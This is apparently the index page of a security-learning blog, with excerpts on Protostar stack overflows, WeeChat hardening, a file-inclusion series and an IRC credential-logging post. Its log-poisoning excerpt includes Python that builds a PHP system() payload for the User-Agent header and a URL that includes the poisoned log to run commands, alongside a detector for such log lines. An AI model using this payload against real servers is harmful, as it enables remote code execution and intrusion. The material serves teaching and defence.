Today’s learning’s – More overflows, ret2libc, opcode and more

This post is a part of my “Today’s Learning’s” series. If you’re interested in, or wonder why, I’m writing these posts, please read my article “My Journey Through 2015”.

So! Another day, more learning. Today has been a really good day for me. I’m still working on the Protostar Stack exercises, and this time I learned how to do basic debugging of shellcode by using the opcode of the INT3 debugger trap instruction (0xCC), which makes the debugger stop exactly where the shellcode starts executing. I also learned how to bypass No-eXecute (NX) protection using the return-to-libc (ret2libc) method, and more…

Continue reading Today’s learning’s – More overflows, ret2libc, opcode and more

Today’s learning’s – Buffer overflow, gdb, and more

Welcome to the first article in my “today’s learning’s” series. Last night and today I have been working on the Stack exercises in Protostar from exploit-exercises.com. So far I’ve solved Stack 0 through 3. These exercises cover the basics of stack-based buffer overflow vulnerabilities, and each exercise teaches you something new about them.

Even though they all have individual goals, I have set one goal for myself as well: to gain a root shell in addition to solving each exercise as originally intended.

Continue reading Today’s learning’s – Buffer overflow, gdb, and more

Installing, configuring and hardening Weechat on Linux

It’s sad to say, but the reality these days is that you can never feel safe anywhere. Not even online, chatting with your friends. Several default settings disclose sensitive information about you and the system you are running, and this information can be of great value to malicious users. So in this article I will describe some steps you can take to feel a tiny bit safer. Continue reading Installing, configuring and hardening Weechat on Linux

0x03 File Inclusion – Log poisoning to code execution

This article is a part of my file inclusion series. If you do not know about file inclusion vulnerability I suggest you read my introductory article on the topic.

In this article I will explain how, in some scenarios, we can use different types of logs on a server to gain remote code execution and, in the end, shell access. This method is called log poisoning: the process of injecting malicious code (typically PHP) into a log file through data the server writes there itself, such as the User-Agent header of a request. We can then use local file inclusion to load the log file, so the interpreter executes the injected code and we can run arbitrary commands on the system.
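The sequence just described, as an added example written for this page (it is not code from the original post): it builds the PHP payload that goes into the User-Agent header, builds the URL that includes the poisoned log and passes the command, and then runs a small detector over constructed access-log lines to show what the attack looks like from the defender's side. The vulnerable `include($_GET['page'])`, the target URL `http://target.example/index.php`, the log path `/var/log/apache2/access.log` and the sample log lines are all assumptions for the example.

```python
import re
from urllib.parse import quote, unquote

# Assumed vulnerable server-side code (hypothetical; not from the original
# post). With an unrestricted include(), any file the web server can read
# is parsed as PHP, the access log included:
#     <?php include($_GET['page']); ?>
VULN_URL = "http://target.example/index.php"    # constructed target
VULN_PARAM = "page"                              # assumed name of the LFI parameter
ACCESS_LOG = "/var/log/apache2/access.log"       # assumed log path (Debian/Ubuntu layout)


def poison_payload(cmd_param: str = "cmd") -> str:
    """PHP code to send as the User-Agent header.

    The server writes the header into the access log, so when the log is
    later include()'d, PHP runs system() on the named GET parameter.
    Single quotes are used because Apache escapes a double quote in a logged
    header as \\", which would break the PHP syntax.
    """
    return f"<?php system($_GET['{cmd_param}']); ?>"


def lfi_url(log_path: str, cmd: str, cmd_param: str = "cmd") -> str:
    """URL that includes the poisoned log and passes the command to execute.

    Caveat: this only works when the web server's user can read the log.
    On many distributions Apache's logs are root:adm 0640, in which case a
    different server-written file has to be poisoned instead.
    """
    return (f"{VULN_URL}?{VULN_PARAM}={quote(log_path, safe='/')}"
            f"&{cmd_param}={quote(cmd)}")


# Constructed Apache "combined" log lines for the detector below. Line 3
# carries the payload in User-Agent. Line 4 is a percent-encoded attempt in
# the request line: Apache logs the URI as received, so PHP would see
# "%3C%3Fphp" rather than "<?php" and not execute it, but the client is
# clearly probing. Line 5 is the include of the log itself.
SAMPLE_LOG = [
    '10.0.0.5 - - [12/Jan/2016:10:01:02 +0100] "GET /index.php?page=about.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [12/Jan/2016:10:01:09 +0100] "GET /index.php?page=../../../../etc/passwd HTTP/1.1" 200 1419 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [12/Jan/2016:10:01:15 +0100] "GET / HTTP/1.1" 200 512 "-" "' + poison_payload() + '"',
    '10.0.0.5 - - [12/Jan/2016:10:01:20 +0100] "GET /%3C%3Fphp%20phpinfo()%3B%20%3F%3E HTTP/1.1" 404 208 "-" "curl/7.47.0"',
    '10.0.0.5 - - [12/Jan/2016:10:01:30 +0100] "GET /index.php?page=/var/log/apache2/access.log&cmd=id HTTP/1.1" 200 9870 "-" "Mozilla/5.0"',
]

# A PHP open tag anywhere in a log line is never legitimate traffic.
PHP_OPEN_TAG = re.compile(r"<\?(?:php\b|=)", re.IGNORECASE)
# The LFI parameter pointing at something that looks like a log file.
LOG_INCLUDE = re.compile(r"[?&]" + re.escape(VULN_PARAM) + r"=[^&\s]*log", re.IGNORECASE)


def find_poisoning(lines):
    """Return [(line_number, reason)] for lines that look like log poisoning
    or the follow-up include. Lines are percent-decoded before matching so
    that encoded probes are reported as well."""
    hits = []
    for n, line in enumerate(lines, 1):
        decoded = unquote(line)
        if PHP_OPEN_TAG.search(decoded):
            hits.append((n, "php_tag"))
        elif LOG_INCLUDE.search(decoded):
            hits.append((n, "log_include"))
    return hits


if __name__ == "__main__":
    print("User-Agent:", poison_payload())
    print("Trigger:   ", lfi_url(ACCESS_LOG, "id"))
    for n, reason in find_poisoning(SAMPLE_LOG):
        print(f"line {n}: {reason}")
```

The detector deliberately decodes the line before matching: the encoded probe on line 4 would never execute through include(), but it is the same attacker, and catching the reconnaissance is cheaper than catching the shell.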

This post is an extension of an old blog post I wrote which is no longer online, so I’m bringing it back to life.
Continue reading 0x03 File Inclusion – Log poisoning to code execution

Things are calming down

This is a really quick update, just to show that the blog is not dead. Finally things are slowing down around here. I’m no longer living in a maze of cardboard boxes and plastic bags, and Christmas is over. It’s been a hectic month, but now I’ve finally got time to sit down and work on my blog.

I’ve written some more on part 3 of my file inclusion series, and I expect to post it very soon, hopefully tomorrow.

I hope everyone has had a great Christmas and enjoyed the holiday with family and good friends.

Stressful times

I know that I have been promoting my posts, and my file inclusion series, around the web, and the third part of it is in the making. But my stress level in real life is currently increasing: I’m working my day job as a developer and have just landed a remote job as a penetration tester. In addition to this we’re currently in the process of moving to a new house.

So with all of this running at the same time, I cannot give this blog the amount of focus I would like to. When things settle down a bit I will continue again.

0x02 File Inclusion – Information harvesting

This article is a part of my file inclusion series. If you do not know about file inclusion vulnerability I suggest you read my introductory article on the topic.

In this article I will talk about how file inclusion can be used to harvest information. From this point on I will go into more technical detail, so I will assume that you have a basic understanding of web application development when reading this. If not, I suggest you find some basic tutorials on it and read through those first, before coming back to this article series. Continue reading 0x02 File Inclusion – Information harvesting

How I logged your credentials on IRC

So, the other day I was watching the “How I Met Your Girlfriend” videos from DefCon 18, in which Samy Kamkar talked about something I had never heard of before: Cross-Protocol Scripting (XPS). This caught my eye instantly and I just had to learn more about it, which is what resulted in the code I’m about to present in this post. I immediately started playing around with the code presented in the video and just could not let it go. Continue reading How I logged your credentials on IRC